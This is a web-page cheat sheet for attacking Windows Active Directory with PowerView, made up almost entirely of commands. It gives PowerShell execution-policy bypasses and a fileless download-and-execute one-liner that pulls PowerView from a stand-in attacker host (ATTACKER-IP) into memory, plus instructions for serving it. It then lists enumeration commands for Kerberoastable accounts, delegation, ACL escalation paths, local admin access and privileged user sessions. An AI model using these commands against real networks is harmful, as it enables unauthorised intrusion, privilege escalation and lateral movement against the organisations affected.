🛡️ PowerShell Execution Policy Bypass

Allows running unsigned PowerShell scripts in the current process.

powershell -ep bypass

Start a new PowerShell without profile restrictions.

powershell.exe -ExecutionPolicy Bypass -NoProfile

Execute PowerView in memory (fileless execution).

powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')"

📥 Loading PowerView

Start temporary HTTP server on attacker machine.

python3 -m http.server 80

Load PowerView directly into memory.

IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')

Download the script locally.

Invoke-WebRequest http://ATTACKER-IP/PowerView.ps1 -OutFile PowerView.ps1

Import the module.

Import-Module .\PowerView.ps1

Check which command naming exists.

Get-Command *Domain*

Get-Command *Net*

🔍 Domain Enumeration

Get general domain information.

Get-Domain

Retrieve the domain SID.

Get-DomainSID

List domain policies.

Get-DomainPolicy

Show password & lockout policy.

(Get-DomainPolicy)."SystemAccess"

Show Kerberos configuration.

(Get-DomainPolicy)."KerberosPolicy"

List domain controllers.

Get-DomainController

Legacy (old PowerView) Get general domain information.

Get-NetDomain

Retrieve the domain SID.

Get-NetDomainSID

List domain policies.

Get-NetDomainPolicy

List domain controllers.

Get-NetDomainController

👤 User Enumeration

List domain users.

Get-DomainUser

Detailed information about a user.

Get-DomainUser -Identity <user> -Properties *

Find Kerberoastable accounts (SPN users).

Get-DomainUser -SPN

Identify privileged/protected accounts.

Get-DomainUser -AdminCount

Accounts trusted for delegation.

Get-DomainUser -TrustedToAuth

Check logged-on users on a machine.

Get-NetLoggedon -ComputerName <computer>

Legacy (old PowerView) List domain users.

Get-NetUser

Get specific user information.

Get-NetUser -UserName <user>

Find Kerberoastable accounts.

Get-NetUser -SPN

Find privileged accounts.

Get-NetUser -AdminCount

💻 Computer Enumeration

List domain computers.

Get-DomainComputer

Find servers only.

Get-DomainComputer -OperatingSystem "*Server*"

Last logged-on user of a machine.

Get-LastLoggedOn -ComputerName <computer>

Legacy (old PowerView) List domain computers.

Get-NetComputer

Find servers only.

Get-NetComputer -OperatingSystem "*Server*"

👥 Group Enumeration

List domain groups.

Get-DomainGroup

Find administrative groups.

Get-DomainGroup *admin*

List group members.

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Find groups a user belongs to.

Get-DomainGroup -UserName <user>

Legacy (old PowerView) List domain groups.

Get-NetGroup

List members of a group.

Get-NetGroupMember -GroupName "Domain Admins"

Find domain shares.

Find-DomainShare

Find accessible shares.

Find-DomainShare -CheckShareAccess

Legacy (old PowerView) Find network shares.

Invoke-ShareFinder

Locate file servers in domain.

Get-NetFileServer

🧾 GPO Enumeration

List Group Policy Objects.

Get-DomainGPO

GPO applied to a computer.

Get-DomainGPO -ComputerName <computer>

Machines where GPO grants admin rights.

Find-GPOComputerAdmin -ComputerName <computer>

Where a user has admin rights via GPO.

Find-GPOLocation -Identity <user>

Legacy (old PowerView) List Group Policy Objects.

Get-NetGPO

🏢 OU Enumeration

List organizational units.

Get-DomainOU

Legacy (old PowerView) List organizational units.

Get-NetOU

🔐 ACL Enumeration

View permissions on AD objects.

Get-DomainObjectAcl -Identity <object> -ResolveGUIDs

Find privilege escalation paths.

Invoke-ACLScanner -ResolveGUIDs

Legacy (old PowerView) View permissions on AD objects.

Get-ObjectAcl -SamAccountName <object>

🔗 Trust Enumeration

Enumerate domain trusts.

Get-DomainTrust

Map trust relationships.

Get-DomainTrustMapping

Legacy (old PowerView) Enumerate domain trusts.

Get-NetDomainTrust

🌲 Forest Enumeration

Get forest information.

Get-Forest

List forest domains.

Get-ForestDomain

List global catalog servers.

Get-ForestGlobalCatalog

Legacy (old PowerView) Get forest information.

Get-NetForest

List forest domains.

Get-NetForestDomain

🎯 Privilege Escalation / Hunting

Find machines where current user is local admin.

Find-LocalAdminAccess

Find privileged sessions.

Invoke-UserHunter

Enumerate local administrators across domain.

Invoke-EnumerateLocalAdmin

Find unconstrained delegation systems.

Get-DomainComputer -Unconstrained

Legacy (old PowerView) Find unconstrained delegation systems.

Get-NetComputer -Unconstrained

Active Directory

Brute-Force / Cracking

Ports

Windows Privesc

Apps

Metasploit

Enumeration with PowerView

🛡️ PowerShell Execution Policy Bypass

📥 Loading PowerView

🔍 Domain Enumeration

👤 User Enumeration

💻 Computer Enumeration

👥 Group Enumeration

🧾 GPO Enumeration

🏢 OU Enumeration

🔐 ACL Enumeration

🔗 Trust Enumeration

🌲 Forest Enumeration

🎯 Privilege Escalation / Hunting

Active Directory

Brute-Force / Cracking

Ports

Windows Privesc

Apps

Metasploit

​🛡️ PowerShell Execution Policy Bypass

​📥 Loading PowerView

​🔍 Domain Enumeration

​👤 User Enumeration

​💻 Computer Enumeration

​👥 Group Enumeration

​📂 Share Enumeration

​🧾 GPO Enumeration

​🏢 OU Enumeration

​🔐 ACL Enumeration

​🔗 Trust Enumeration

​🌲 Forest Enumeration

​🎯 Privilege Escalation / Hunting

🛡️ PowerShell Execution Policy Bypass

📥 Loading PowerView

🔍 Domain Enumeration

👤 User Enumeration

💻 Computer Enumeration

👥 Group Enumeration

📂 Share Enumeration

🧾 GPO Enumeration

🏢 OU Enumeration

🔐 ACL Enumeration

🔗 Trust Enumeration

🌲 Forest Enumeration

🎯 Privilege Escalation / Hunting